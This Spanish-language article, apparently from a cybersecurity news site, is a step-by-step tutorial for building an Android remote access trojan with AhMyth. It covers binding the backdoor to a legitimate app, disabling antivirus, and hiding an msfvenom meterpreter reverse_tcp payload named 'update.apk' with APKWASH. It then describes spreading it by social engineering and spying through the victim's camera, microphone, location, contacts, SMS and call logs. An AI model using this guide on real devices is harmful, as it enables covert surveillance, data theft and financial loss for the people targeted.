El hacking de móviles es una de las tendencias cibercriminales más peligrosas, ya que permite a los actores de amenazas realizar una vigilancia detallada de personas de interés, robar información personal e incluso vaciar cuentas bancarias y billeteras de criptomoneda de forma remota y sin levantar sospechas.
En esta ocasión, especialistas del curso de seguridad móvil del Instituto Internacional de Seguridad Cibernética (IICS) le mostrarán uno de los métodos y herramientas más populares para el ataque de dispositivos inteligentes, empleado por los grupos de hacking de móviles más reconocidos. Para ser específicos, este tutorial detalla la creación de un troyano de acceso remoto (RAT) para dispositivos Android.
Recuerde que este artículo fue elaborado con fines exclusivamente informativos y no debe ser tomado como un llamado a la acción; IICS no es responsable del mal uso que pueda darse a la información aquí contenida.
Cómo crear un troyano para Android
Los especialistas en hacking de móviles señalan que el término RAT puede referirse a cualquier utilidad de administración remota, como el popular software TeamViewer, empleado en el curso de seguridad móvil de IICS. A pesar de que tienen múltiples usos legítimos, los actores de amenazas pueden utilizar herramientas RAT para comprometer toda clase de sistemas vulnerables.
AhMyth RAT es una aplicación de código abierto disponible solamente en fase beta. La herramienta está dirigida a usuarios de Windows, pero las fuentes de AhMyth también se pueden descargar de GitHub para plataformas similares a UNIX, señalan los expertos en hacking de móviles.
La función para crear un RAT para Android con este programa consta de dos etapas:
- Una aplicación de servidor que se puede utilizar para controlar un dispositivo infectado y crear archivos APK con código malicioso. Fue creado en el marco Electron, desarrollado en GitHub para crear aplicaciones gráficas simples
- Un APK cliente para almacenar el código malicioso que permite el acceso remoto al dispositivo Android infectado. Es decir, el archivo APK generado actuará como un backdoor
Instalación de AhMyth RAT
Los expertos en hacking de móviles señalan que esta utilidad requiere una máquina virtual Java instalada en nuestro sistema; puede descargar estas implementaciones desde el sitio web oficial de Java.
Posteriormente, deberemos descargar los binarios de AhMyth RAT, disponibles en el repositorio oficial del proyecto en GitHub. Los expertos recomiendan desactivar el antivirus durante el proceso de descarga para evitar problemas durante la instalación.
Crear una APK maliciosa
Para crear un archivo APK de Android, abra la pestaña APK Builder. La apariencia del constructor para crear una RAT para Android se muestra a continuación:
Es muy fácil utilizar el constructor AhMyth RAT. En la ventana IP de origen, debe ingresar la dirección IP de la máquina atacante:
En el campo Puerto de origen, puede especificar el puerto que la máquina reservará para escuchar las conexiones (el puerto predeterminado es 42 474). También hay una opción Bind With Another Apk que le permite vincular un archivo APK a otra aplicación, señalan los especialistas del curso de seguridad móvil.
Para hacer esto, marque la casilla Bind With Another Apk, seleccione la APK requerida y especifique el método para integrar el malware en el teléfono. Hay dos métodos: ejecutando una APK infectada o reiniciando el teléfono después de instalar el RAT. Los creadores de la herramienta recomiendan implementar la segunda opción.
Posteriormente haga clic en el botón Generar; de forma predeterminada, el archivo infectado se guarda en la siguiente carpeta:
C:\Users\<Your_Username>\AhMyth\Output
Cómo evitar las soluciones antivirus
La evasión del antivirus Android es una de las tareas más difíciles en el hacking de móviles, o al menos lo es para los no iniciados. Con este fin, emplearemos una herramienta conocida como APKWASH, capaz de ocultar apps maliciosas para que la mayoría de soluciones antivirus no puedan detectar la carga útil del ataque.
Descargue la herramienta APKWASH y clónela en Kali Linux usando el siguiente comando:
git clone https://github.com/jbreed/apkwash.git
Otorgue permisos de ejecución a la herramienta con el siguiente comando:
chmod + x apkwash
mv apkwash / usr / local / bin /
Ahora podemos usar los siguientes comandos para explorar las funciones de la herramienta, mencionan los expertos en hacking de móviles:
- –p | –Payload <payload> Establece la carga útil que generará msfvenom
- –о | –Output <outfile.apk> Establece el nombre del APK generado, así como el archivo APK de salida
- -x | –Original <infile.apk> El APK en el que se insertará la carga útil
- –g | –Generate Establece la carga útil usando valores predeterminados
- -n | –Newkey Genera una nueva clave de depuración antes de firmar
- -v | –Verbose No enmascarar la salida del comando
- -d | –Debug Leaves/tmp/ archivos de carga útil en su lugar para su visualización
- –h | Ayuda
apkwash -p android / meterpreter / reverse_tcp LHOST = 192.168.0.12 LPORT = 1337 -o update.apk
Ahora tiene una APK maliciosa que las soluciones antivirus no podrán detectar.
Con la experiencia adecuada, podrá mejorar la herramienta por su cuenta, mencionan los expertos en hacking para móviles.
Distribución del RAT para Android
Las apps maliciosas son detectadas con facilidad por los mecanismos de seguridad de Google Play Store, por lo que es necesario encontrar otro método de distribución. Usualmente estas APK se distribuyen a través de campañas de ingeniería social, ya que también se requiere activar el RAT después de instalar la aplicación maliciosa, por lo que se debe tener en cuenta esta etapa del ataque, mencionan los expertos en hacking de móviles.
El éxito del ataque también requiere que la opción “Instalar solo desde fuentes confiables” esté deshabilitada, lo que permite instalar aplicaciones disponibles en fuentes no oficiales.
Conexión a dispositivos afectados
Para la siguiente etapa del ataque, vaya a Víctimas y conduzca el mismo puerto al campo que indicamos anteriormente, para que el servidor espere las conexiones de los dispositivos infectados. Nuevamente, si no cambió nada al compilar el APK, tampoco es necesario que especifique nada aquí.
Haga clic en Escuchar, y si la APK maliciosa ha infectado con éxito un dispositivo móvil, veremos una nueva conexión.
El programa también registra todas las acciones en la consola ubicada en la parte inferior de la ventana. El significado de las columnas de la revista es generalmente evidente, pero revisemos los detalles a continuación:
- Country: Ubicación en la que está funcionando el dispositivo infectado
- Manuf: Fabricante del dispositivo
- Model: código o nombre de modelo del dispositivo.
- Release: la versión del sistema operativo del dispositivo infectado (en mi caso, es Android 10).
- IP/Port: Dirección IP y puerto del dispositivo a través del cual el dispositivo infectado se conecta a la máquina atacante
Una vez que nos hemos familiarizado con estos conceptos, podremos dirigirnos a la sección Open The Lab. En este menú, encontraremos siete opciones adicionales que da acceso a diversas funciones del programa.
Cámara
Primero, echemos un vistazo a la sección Cámara. Seleccione la cámara: frontal (frontal) o principal (trasera), y puede tomar una foto presionando el botón Snap.
Administrador de archivos
Esta herramienta no es tan avanzada como en otros desarrollos RAT, mencionan los expertos del curso de seguridad móvil, aunque sigue siendo realmente útil. Empleando esta herramienta, es posible descargar los archivos almacenados en el dispositivo infectado; como puede ver, el directorio de inicio es el directorio root y solo se puede acceder a él con derechos de administrador.
Micrófono
Esta función permite utilizar el micrófono del dispositivo en segundo plano y grabar cualquier registro posible en cuestión de segundos. Luego presione Grabar y espere; el archivo resultante puede escucharse directamente en la ventana del programa o guardarse en su máquina.
Datos de ubicación
Esta es una de las funciones principales de AhMyth. Si la transmisión de datos de ubicación está habilitada en el dispositivo infectado, podremos conocer con éxito la localización precisa de los usuarios afectados, con un margen de error de unos 10 metros.
Contactos
Con esta función, es posible extraer la lista completa de contactos registrados en el teléfono de la víctima, mencionan los expertos en hacking de móviles.
Mensajes SMS
Con esta función, los usuarios pueden enviar mensajes SMS a otros usuarios e incluso ver y descargar todos los mensajes que llegaron a este dispositivo. Para enviar un SMS, vaya a la pestaña Enviar SMS, especifique el número de teléfono del destinatario (campo PARA: //) y, en el campo Mensaje, ingrese el texto del mensaje deseado. Después de eso, todo lo que queda es presionar el botón ENVIAR.
Registro de llamadas
Esta sección le permite ver el historial de llamadas telefónicas en el dispositivo del usuario afectado. Empleando esta función, los actores de amenazas pueden encontrar detalles como nombre del contacto, número telefónico, duración de la llamada y tipo de entrada (ya sea entrante o saliente).
Conclusiones
Los expertos en hacking de móviles consideran que esta herramienta es extremadamente útil y puede ayudar en una amplia variedad de situaciones, por lo que es muy popular entre algunos grupos cibercriminales. Ante esta situación, lo mejor para los usuarios es evitar la instalación de apps descargadas desde plataformas no oficiales, ya que esta es la principal vía de ataques con troyanos para Android.
Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).
Trabajando como arquitecto de soluciones de ciberseguridad, Alisa se enfoca en la protección de datos y la seguridad de datos empresariales. Antes de unirse a nosotros, ocupó varios puestos de investigador de ciberseguridad dentro de una variedad de empresas de seguridad cibernética. También tiene experiencia en diferentes industrias como finanzas, salud médica y reconocimiento facial.
Envía tips de noticias a info@noticiasseguridad.com o www.instagram.com/iicsorg/
También puedes encontrarnos en Telegram www.t.me/noticiasciberseguridad